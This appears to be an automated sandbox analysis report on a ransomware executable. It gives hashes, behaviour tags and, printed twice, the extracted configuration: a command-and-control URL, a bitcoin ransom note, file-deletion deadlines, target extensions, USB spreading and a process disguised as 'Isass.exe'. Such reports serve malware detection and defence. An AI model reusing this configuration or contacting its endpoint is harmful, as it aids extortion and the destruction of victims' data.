General

  • Target

    BC7CB37B305FBDB0E970E708BAE94E05.exe

  • Size

    749KB

  • Sample

    230316-gw4jkshc78

  • MD5

    bc7cb37b305fbdb0e970e708bae94e05

  • SHA1

    bfb158510a5d2e6750c2e56c32cbd5149af1ab4d

  • SHA256

    57ac35dc3a92242f14f37709177b064907d6b1a7fe6027931ebbbcd66eccdb3e

  • SHA512

    ac0974e70ca1be81108c76c1f84075f248571dc7e2c8958e7896f1fb966628261291f5a3aa83a09f0afde4a195a860982015ee67a349e6e605e10ad791ba4feb

  • SSDEEP

    12288:yozGdX0M4ornOmZIzfMwHHQmRROXKRthZ/jeiPs5zE3Gsv:y4GHnhIzOaRzZAzvsv

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\pd4ta.dat

Ransom Note

[file]
mutex=de33058b156b20dee20f67f62b7669ca
uac=not
[bridges]
1=http://foolonthehill.website/dv/aldey/bridge-aldey.php
[message]
115be2b98435259cbbcaa793c9b9dffc=All your files have been encrypted!\r\n\r\nAll your documents (databases, texts, images, videos, musics etc.) were encrypted. The encryption was done using a secret key \r\nthat is now on our servers.\r\n\r\nTo decrypt your files you will need to buy the secret key from us. We are the only on the world who can provide this for you.\r\n\r\nWhat can I do?\r\n\r\nPay the ransom, in bitcoins, in the amount and wallet below. You can use LocalBitcoins.com to buy bitcoins.
[strings]
02061592f063b9b4e08f2adb3f8535c0=Deadline
50290a893d63a7afe77bef084ffb2a1b=Russian Roulette
fb31ddd9c54fd3dd5a07c813678a3f62=Last file Deleted:
d8aea318c44105aac275125140e7b085=Bitcoin Amount
becb5f809420f184d8bc5b17f356a725=Wallet for Sending Bitcoins
0335a3a7ca4ecc2e1ba974a827efe31a=Copy
1084cf36076b23783289bf73bde2e0b5=Decrypt your Files
8802e8fce5bb3427e0705653fcffce77=Paste here the transaction ID to get your files back:
6fa726501ada6cb7cba8280032a303de=Click to Check
aef87c1b6f665ebea931b4dd7322ba07=Speech (blank for none)
[russian]
enable=1
amount=2
interval=7
unit=h
[deadline]
enable=1
delfiles=1
delkey=1
interval=4
unit=D
[ping]
interval=60
[color]
bg=0x11EE2D
fg=0x000000
[random]
sethidden=t
melt=t
gentxt=1
[folders]
<fixed drives>=1
<removable drives>=1
<network drives>=1
<drive root folders>=1
Desktop=2
My Documents=2
Favorites=1
Home Path=2
Home Drive=0
Downloads=2
Pictures=2
Music=2
Videos=2
Desktop Common=2
Documents Common=2
[settings]
extensions=*.7z;*.avi;*.bmp;*.cdr;*.dmg;*.doc;*.docx;*.gif;*.html;*.jpeg;*.jpg;*.mov;*.mp3;*.mp4;*.pdf;*.png;*.ppt;*.pptx;*.rar;*.rtf;*.tiff;*.txt;*.wallet;*.wma;*.wmv;*.xls;*.xlsx;*.zip
usbinfect=1
unkillable=1
process=Isass.exe
extractto=%appdata%
showb4=1
[temp]
p=mNMgpIpJkjHARAjA_iuC]kPn^ya^vemdQDY^WG

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\pd4ta.dat

Ransom Note

[file]
mutex=de33058b156b20dee20f67f62b7669ca
uac=not
[bridges]
1=http://foolonthehill.website/dv/aldey/bridge-aldey.php
[message]
115be2b98435259cbbcaa793c9b9dffc=All your files have been encrypted!\r\n\r\nAll your documents (databases, texts, images, videos, musics etc.) were encrypted. The encryption was done using a secret key \r\nthat is now on our servers.\r\n\r\nTo decrypt your files you will need to buy the secret key from us. We are the only on the world who can provide this for you.\r\n\r\nWhat can I do?\r\n\r\nPay the ransom, in bitcoins, in the amount and wallet below. You can use LocalBitcoins.com to buy bitcoins.
[strings]
02061592f063b9b4e08f2adb3f8535c0=Deadline
50290a893d63a7afe77bef084ffb2a1b=Russian Roulette
fb31ddd9c54fd3dd5a07c813678a3f62=Last file Deleted:
d8aea318c44105aac275125140e7b085=Bitcoin Amount
becb5f809420f184d8bc5b17f356a725=Wallet for Sending Bitcoins
0335a3a7ca4ecc2e1ba974a827efe31a=Copy
1084cf36076b23783289bf73bde2e0b5=Decrypt your Files
8802e8fce5bb3427e0705653fcffce77=Paste here the transaction ID to get your files back:
6fa726501ada6cb7cba8280032a303de=Click to Check
aef87c1b6f665ebea931b4dd7322ba07=Speech (blank for none)
[russian]
enable=1
amount=2
interval=7
unit=h
[deadline]
enable=1
delfiles=1
delkey=1
interval=4
unit=D
[ping]
interval=60
[color]
bg=0x11EE2D
fg=0x000000
[random]
sethidden=t
melt=t
gentxt=1
[folders]
<fixed drives>=1
<removable drives>=1
<network drives>=1
<drive root folders>=1
Desktop=2
My Documents=2
Favorites=1
Home Path=2
Home Drive=0
Downloads=2
Pictures=2
Music=2
Videos=2
Desktop Common=2
Documents Common=2
[settings]
extensions=*.7z;*.avi;*.bmp;*.cdr;*.dmg;*.doc;*.docx;*.gif;*.html;*.jpeg;*.jpg;*.mov;*.mp3;*.mp4;*.pdf;*.png;*.ppt;*.pptx;*.rar;*.rtf;*.tiff;*.txt;*.wallet;*.wma;*.wmv;*.xls;*.xlsx;*.zip
usbinfect=1
unkillable=1
process=Isass.exe
extractto=%appdata%
showb4=1
[temp]
p=BVG]MAZkECbWkSjCkalGguAyFbfhOtFkq]RDRt

Targets

    • Target

      BC7CB37B305FBDB0E970E708BAE94E05.exe

    • Size

      749KB

    • MD5

      bc7cb37b305fbdb0e970e708bae94e05

    • SHA1

      bfb158510a5d2e6750c2e56c32cbd5149af1ab4d

    • SHA256

      57ac35dc3a92242f14f37709177b064907d6b1a7fe6027931ebbbcd66eccdb3e

    • SHA512

      ac0974e70ca1be81108c76c1f84075f248571dc7e2c8958e7896f1fb966628261291f5a3aa83a09f0afde4a195a860982015ee67a349e6e605e10ad791ba4feb

    • SSDEEP

      12288:yozGdX0M4ornOmZIzfMwHHQmRROXKRthZ/jeiPs5zE3Gsv:y4GHnhIzOaRzZAzvsv

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Adds Run key to start application

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • AutoIT Executable

      AutoIT scripts compiled to PE executables.

MITRE ATT&CK Enterprise v6

Tasks